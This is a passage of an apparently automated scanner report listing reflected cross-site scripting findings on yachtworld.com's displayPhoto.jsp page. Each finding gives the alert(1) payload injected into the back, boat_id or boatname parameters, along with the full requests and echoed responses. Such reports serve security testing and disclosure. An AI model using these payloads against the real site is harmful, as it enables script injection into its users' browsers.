Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<meta name="description" content="2004 regulator da9fa"><script>alert(1)</script>dc4f88da9f6701ea3 Boats For Sale - YachtWorld.com">
...[SNIP]...

3.402. http://www.yachtworld.com/core/listing/displayPhoto.jsp [back parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/displayPhoto.jsp

Issue detail

The value of the back request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ae0"><script>alert(1)</script>36fac5af912 was submitted in the back parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/displayPhoto.jsp?boat_id=2266476&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**&photo_revised_date=1285261228000&photo_name=Photo+1&photo=1&url=&back=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-Statesd1ae0"><script>alert(1)</script>36fac5af912 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:34:17 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 23 Sep 2010 17:00:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-Statesd1ae0"><script>alert(1)</script>36fac5af912">
...[SNIP]...

3.403. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boat_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/displayPhoto.jsp

Issue detail

The value of the boat_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d874'%3balert(1)//6c6594103ea was submitted in the boat_id parameter. This input was echoed as 9d874';alert(1)//6c6594103ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/displayPhoto.jsp?boat_id=22664769d874'%3balert(1)//6c6594103ea&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**&photo_revised_date=1285261228000&photo_name=Photo+1&photo=1&url=&back=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:32:46 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 23 Sep 2010 17:00:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "22664769d874';alert(1)//6c6594103ea"<br>
...[SNIP]...

3.404. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/displayPhoto.jsp

Issue detail

The value of the boatname request parameter is copied into the HTML document as plain text between tags. The payload 92195<script>alert(1)</script>11ea7dea924 was submitted in the boatname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/displayPhoto.jsp?boat_id=2266476&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**92195<script>alert(1)</script>11ea7dea924&photo_revised_date=1285261228000&photo_name=Photo+1&photo=1&url=&back=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:33:08 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 23 Sep 2010 17:00:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<h1>32' 32 Regulator WITH TRAILER **REDUCED**92195<script>alert(1)</script>11ea7dea924</h1>
...[SNIP]...

3.405. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/displayPhoto.jsp

Issue detail

The value of the boatname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fc50"><script>alert(1)</script>22d2fa69268 was submitted in the boatname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/displayPhoto.jsp?boat_id=2266476&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**2fc50"><script>alert(1)</script>22d2fa69268&photo_revised_date=1285261228000&photo_name=Photo+1&photo=1&url=&back=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:33:02 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 23 Sep 2010 17:00:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<meta name="keywords" content=", 32' 32 Regulator WITH TRAILER **REDUCED**2fc50"><script>alert(1)</script>22d2fa69268, Photo 1, boat photos, yacht photos, photo gallery, view photos, boat pictures, yacht pictures"/>
...[SNIP]...

3.406. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/displayPhoto.jsp

Issue detail

The value of the boatname request parameter is copied into the HTML document as text between TITLE tags. The payload f3c24</title><script>alert(1)</script>434c56e2e6b was submitted in the boatname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/displayPhoto.jsp?boat_id=2266476&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**f3c24</title><script>alert(1)</script>434c56e2e6b&photo_revised_date=1285261228000&photo_name=Photo+1&photo=1&url=&back=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUni